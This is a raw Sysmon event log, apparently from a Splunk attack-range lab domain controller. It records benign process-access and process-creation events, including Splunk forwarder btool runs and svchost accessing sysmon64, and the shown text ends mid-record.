10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4200-000000007F01}3948C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4200-000000007F01}3948C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.090{5D479F2C-16B3-5F84-4100-000000007F01}39243928C:\Windows\system32\cmd.exe{5D479F2C-16B3-5F84-4200-000000007F01}3948C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.091{5D479F2C-16B3-5F84-4200-000000007F01}3948C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B3-5F84-4100-000000007F01}3924C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4100-000000007F01}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4100-000000007F01}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16B2-5F84-3C00-000000007F01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B3-5F84-4100-000000007F01}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.086{5D479F2C-16B3-5F84-4100-000000007F01}3924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4000-000000007F01}3916C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.074{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B3-5F84-4000-000000007F01}3916C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNE